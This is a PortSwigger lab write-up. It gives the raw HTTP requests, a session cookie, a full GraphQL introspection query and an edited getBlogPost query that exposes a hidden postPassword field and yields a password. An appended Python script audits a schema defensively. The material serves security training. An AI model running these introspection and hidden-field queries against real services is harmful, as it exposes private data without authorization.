PortSwigger: Accessing private GraphQL posts
Solution
Open website: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/graphql/v1
POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 249
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"\n query getBlogPost($id: Int!) {\n getBlogPost(id: $id) {\n image\n title\n author\n date\n paragraphs\n }\n }","operationName":"getBlogPost","variables":{"id":4}}
Set introspection query
GraphQL > Set introspection query
---
POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 1404
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n}"}
---
query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    subscriptionType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
      }
    }
  }
}
Edit GraphQL query
Edit the query and add the "postPassword" field.
Edit the variables and set id: 3.
Found password: 3bnpflnd5u8giovm6vm7b4631hep4e4i
---
POST /graphql/v1 HTTP/2
Host: 0ad40088034d63e9804f5858004e004c.web-security-academy.net
Cookie: session=No0faruHvddyi3OsArneBu96UZN6wxty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net/post?postId=4
Content-Type: application/json
Content-Length: 273
Origin: https://0ad40088034d63e9804f5858004e004c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"query":"\n query getBlogPost($id: Int!) {\n getBlogPost(id: $id) {\n image\n title\n author\n date\n paragraphs\n postPassword\n }\n }","operationName":"getBlogPost","variables":{"id":3}}
---
query getBlogPost($id: Int!) {
  getBlogPost(id: $id) {
    image
    title
    author
    date
    paragraphs
    postPassword
  }
}
Password: 3bnpflnd5u8giovm6vm7b4631hep4e4i
Solved
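
The steps above work because introspection lists every field on the post type, including postPassword, which the front-end query never requests. As an added example (not part of the original write-up and not PortSwigger's code), the following Python audits an introspection response for fields like that. The type name BlogPost, the field types, the function names and the name patterns are assumptions, and the sample response is constructed.

```python
import json
import re

SENSITIVE = re.compile(r"pass(word|wd)?|secret|token|api_?key", re.I)
# Fields the front-end getBlogPost query on this page requests.
CLIENT_FIELDS = {"BlogPost": {"image", "title", "author", "date", "paragraphs"}}

def field(name, type_name, non_null=True):
    """Build one introspection field entry for the constructed sample."""
    ref = {"kind": "SCALAR", "name": type_name, "ofType": None}
    if non_null:
        ref = {"kind": "NON_NULL", "name": None, "ofType": ref}
    return {"name": name, "type": ref}

# Constructed sample in the shape the IntrospectionQuery returns. The type
# name "BlogPost" and the field types are assumptions, not lab output.
SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {"types": [
    {"kind": "OBJECT", "name": "BlogPost", "fields": [
        field("image", "String"), field("title", "String"),
        field("author", "String"), field("date", "String"),
        field("paragraphs", "String"), field("postPassword", "String", False)]},
    {"kind": "OBJECT", "name": "__Type", "fields": [field("name", "String")]},
    {"kind": "SCALAR", "name": "String", "fields": None},
]}}})

def named_type(ref):
    """Follow the ofType chain (NON_NULL / LIST wrappers) to the named type."""
    while ref.get("ofType"):
        ref = ref["ofType"]
    return ref["name"]

def audit_schema(response_text, client_fields):
    """List object fields that look sensitive or that no client query uses."""
    schema = json.loads(response_text)["data"]["__schema"]
    findings = []
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue  # skip scalars, enums and introspection meta-types
        used = client_fields.get(t["name"], set())
        for f in t.get("fields") or []:
            checks = {"sensitive-name": bool(SENSITIVE.search(f["name"])),
                      "unused-by-client": f["name"] not in used}
            reasons = [name for name, hit in checks.items() if hit]
            if reasons:
                findings.append((t["name"], f["name"], named_type(f["type"]), reasons))
    return findings

if __name__ == "__main__":
    print(audit_schema(SAMPLE_RESPONSE, CLIENT_FIELDS))
```

A finding such as postPassword calls for removing the field from the public schema or enforcing authorization in its resolver; disabling introspection alone only hides the field name.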